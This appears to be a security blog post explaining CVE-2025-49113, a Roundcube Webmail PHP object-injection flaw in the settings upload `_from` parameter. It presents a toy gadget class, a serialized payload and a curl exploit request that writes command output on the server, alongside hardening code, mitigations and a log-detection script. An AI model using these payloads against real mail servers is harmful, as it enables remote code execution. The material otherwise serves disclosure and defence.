CVE-2025-49113 is a critical vulnerability affecting Roundcube Webmail (before version 1.5.10 and 1.6.x before 1.6.11). If you're running one of these versions, your mail server is exposed to remote code execution (RCE), and the attacker needs nothing more than an ordinary logged-in user account.
This post explains what’s going wrong, how attackers can exploit this hole, why it’s dangerous, and what you can do about it (with code snippets and official references).
What’s Going On: The Vulnerability
At the root of this CVE is insecure handling of PHP object deserialization in the upload handler of the settings module, `program/actions/settings/upload.php`.
When an authenticated user uploads something (for example, when importing account settings), one of the URL parameters, `_from`, is passed into the script without proper validation or sanitization. If this parameter is a specially crafted string, it reaches PHP's `unserialize()` with attacker-controlled data.
This is dangerous because `unserialize()` turns such strings into live PHP objects, and objects can run code through so-called "magic methods" (such as `__destruct()`) without the application ever calling them explicitly.
Let's walk through a simplified flow:
```php
// In program/actions/settings/upload.php (simplified)
if (isset($_GET['_from'])) {
    $from_data = $_GET['_from'];
    // DANGEROUS: unserializing a user-provided value!
    $from = @unserialize($from_data);
    // ... $from is then used in further logic
}
```
If a logged-in attacker sends a request like
```http
GET /?_task=settings&_action=upload&_from=<serialized_payload>...
```
…with a `_from` parameter containing a PHP serialized object, that object gets deserialized. If it forms a gadget chain (an object whose `__destruct()` or `__wakeup()` does something dangerous, or which invokes a class with a risky method), attacker-controlled PHP code runs on the server.
Assume there is a class like this somewhere in your code:
```php
class Vulnerable {
    public $cmd;
    function __destruct() {
        system($this->cmd);
    }
}
```
An attacker crafts a payload:
```php
// "id > /tmp/pwned" is 15 bytes, so the serialized string length is s:15
$payload = 'O:10:"Vulnerable":1:{s:3:"cmd";s:15:"id > /tmp/pwned";}'; // writes Linux user info to /tmp/pwned
$url = "https://victim/roundcube/?_task=settings&_action=upload&_from=" . urlencode($payload);
```
Whoever visits this URL as a logged-in user (the attacker can simply do it themselves) executes the command on the server!
Let's see a minimal exploit with curl, for demo purposes:
```bash
# "id>/tmp/pwned" is 13 bytes, hence s:13 in the URL-encoded payload
curl -s -k \
  -b "roundcube_sessid=<auth-session-cookie>" \
  "https://victim.com/roundcube/?_task=settings&_action=upload&_from=O%3A10%3A%22Vulnerable%22%3A1%3A%7Bs%3A3%3A%22cmd%22%3Bs%3A13%3A%22id%3E%2Ftmp%2Fpwned%22%3B%7D"
```
(substitute your own session cookie and payload as needed).
In real attacks the payload would not rely on a toy class like the one above, but on classes that already exist in the application or in bundled third-party libraries (such as Guzzle or Monolog), which is what makes real-world exploitation practical.
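The following is an added example, not Roundcube's code and not the post author's: it places the `unserialize()` pattern described above next to a hardened version of the same handler, using the post's toy `Vulnerable` class (with `system()` replaced by an audit record so the script is safe to run). The `handleFromHardened()` allow-list and the `Audit` class are assumptions for illustration; `unserialize()`'s `allowed_classes` option is real PHP (7.0+).

```php
<?php
// Added example (not from the post or Roundcube). Runs stand-alone: php example.php

// Assumed toy gadget, same shape as the post's Vulnerable class, but the
// destructor only records the command instead of executing it.
class Audit { public static array $executed = []; }

class Vulnerable {
    public $cmd;
    function __destruct() {
        Audit::$executed[] = $this->cmd;   // stand-in for system($this->cmd)
    }
}

// VULNERABLE: the pattern the post describes. Whatever class name the
// attacker puts into the string gets instantiated, magic methods included.
function handleFromVulnerable(string $from_data) {
    return @unserialize($from_data);
}

// HARDENED, step 1: _from is a short identifier, never an object, so validate
// its shape and do not pass it to unserialize() at all. The allow-list regex
// is an assumption for this example.
function handleFromHardened(string $from_data): ?string {
    if (!preg_match('/^[a-z0-9_-]{1,32}$/', $from_data)) {
        return null;   // reject (and log) instead of deserializing
    }
    return $from_data;
}

// HARDENED, step 2 (defense in depth where unserialize() cannot be removed yet):
// allowed_classes => false turns every object into __PHP_Incomplete_Class,
// whose magic methods are never invoked, so gadget chains are inert.
function safeUnserialize(string $data) {
    return unserialize($data, ['allowed_classes' => false]);
}

// Constructed payload: the same gadget the post uses, with a harmless command.
$payload = 'O:10:"Vulnerable":1:{s:3:"cmd";s:2:"id";}';

$obj = handleFromVulnerable($payload);
unset($obj);                                   // __destruct() fires here
printf("vulnerable path executed: %s\n", json_encode(Audit::$executed)); // ["id"]

var_dump(handleFromHardened($payload));        // NULL: rejected by the allow-list
var_dump(handleFromHardened('edit-identity')); // string(13) "edit-identity"

$safe = safeUnserialize($payload);
printf("safe path produced: %s\n", get_class($safe)); // __PHP_Incomplete_Class
unset($safe);                                  // no destructor runs
printf("commands recorded after safe path: %d\n", count(Audit::$executed)); // still 1
```

Step 1 is the actual fix: a parameter that is meant to be an identifier should be validated as one and never deserialized. Step 2 is a code-base-wide safety net worth applying to every remaining `unserialize()` call on untrusted input; for data that genuinely needs to round-trip, `json_encode()`/`json_decode()` avoids the problem entirely because JSON cannot carry objects with behaviour.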
References and Fixes
Official announcement from Roundcube:
- https://github.com/roundcube/roundcubemail/releases/tag/1.5.10
- https://github.com/roundcube/roundcubemail/releases/tag/1.6.11
CVE record:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-49113
Technical breakdown (RedTeam Pentesting):
- https://www.redteam-pentesting.de/advisories/rt-sa-2024-001
If you can't upgrade immediately:
* Block access to /program/actions/settings/upload.php via your web server.
* Filter or restrict the _from parameter.
* Remove any unnecessary PHP classes with dangerous magic methods.
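Alongside those mitigations you will want to know whether anyone has already tried this against you. The script below is an added example (not from the post or Roundcube) that scans web server access logs for the request shape the post's own curl demo uses: `_task=settings&_action=upload` with a `_from` value that decodes to a serialized PHP object. The three log lines are constructed for the demo; the field layout follows the common combined log format.

```php
<?php
// Added example: hunt access logs for serialized-object payloads in _from.
// Usage: php hunt.php < /var/log/apache2/access.log   (or run as-is on the samples)

// Constructed sample lines: one legitimate upload, one exploit attempt, one unrelated request.
$sampleLines = [
    '10.0.0.5 - - [02/Jun/2025:10:14:01 +0000] "GET /roundcube/?_task=settings&_action=upload&_from=edit-identity HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [02/Jun/2025:10:15:22 +0000] "GET /roundcube/?_task=settings&_action=upload&_from=O%3A10%3A%22Vulnerable%22%3A1%3A%7Bs%3A3%3A%22cmd%22%3Bs%3A2%3A%22id%22%3B%7D HTTP/1.1" 200 512 "-" "curl/8.5.0"',
    '10.0.0.7 - - [02/Jun/2025:10:16:03 +0000] "GET /roundcube/?_task=mail&_action=list HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
];

// True if the (already URL-decoded) value contains a PHP object token:
// O:<len>:"<class>" or C:<len>:"<class>", at the start or nested inside an array/object.
function looksSerializedObject(string $value): bool {
    return (bool) preg_match('/(?:^|[{;])(?:O|C):\d+:"/', $value);
}

// Returns one record per suspicious request: client IP, timestamp and the decoded _from value.
function suspiciousUploadRequests(iterable $lines): array {
    $hits = [];
    foreach ($lines as $line) {
        // client, ident, user, [timestamp], "METHOD path"
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) ([^ "]+)/', $line, $m)) {
            continue;
        }
        $query = parse_url($m[3], PHP_URL_QUERY);
        if (!is_string($query)) {
            continue;
        }
        parse_str($query, $params);          // parse_str() URL-decodes the values
        if (($params['_task'] ?? '') !== 'settings' || ($params['_action'] ?? '') !== 'upload') {
            continue;
        }
        $from = (string) ($params['_from'] ?? '');
        if (looksSerializedObject($from)) {
            $hits[] = ['ip' => $m[1], 'time' => $m[2], 'from' => $from];
        }
    }
    return $hits;
}

// Read stdin when piped, otherwise fall back to the constructed samples.
$input = (posix_isatty(STDIN) ?? true) ? $sampleLines : (file('php://stdin', FILE_IGNORE_NEW_LINES) ?: []);

foreach (suspiciousUploadRequests($input) as $hit) {
    printf("ALERT %s client=%s _from=%s\n", $hit['time'], $hit['ip'], substr($hit['from'], 0, 60));
}
// On the samples this prints exactly one ALERT, for 10.0.0.9.
```

Two caveats: access logs only capture the query string, so a payload sent in a POST body needs request-body logging or a WAF rule at the same decision point, and a hit is a hunting lead rather than proof of compromise. On a match, check the session owner, look for new files or processes under the web server's user, and treat the account's credentials as compromised.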
Summary Table
| Impact | Exploitability | CISA Exploit-Chain? |
|------------|----------------------|---------------------|
| RCE | Authenticated Users | YES |
*If you're running an unpatched Roundcube, anyone holding an ordinary user account (or a foothold inside your network) could take over your server.*
Conclusion
CVE-2025-49113 is a classic, devastating example of PHP object injection. It’s simple to exploit, needs only an ordinary user account, and can result in a full system compromise.
Protect your Roundcube! Patch, filter, and watch out for unserialize in your codebase.
If your IT doesn’t have a patch plan, show them this post.
Further Reading
- Roundcube Official Changelog
- OWASP: PHP Object Injection
Timeline
Published on: 06/02/2025 05:15:53 UTC
Last modified on: 06/02/2025 18:15:24 UTC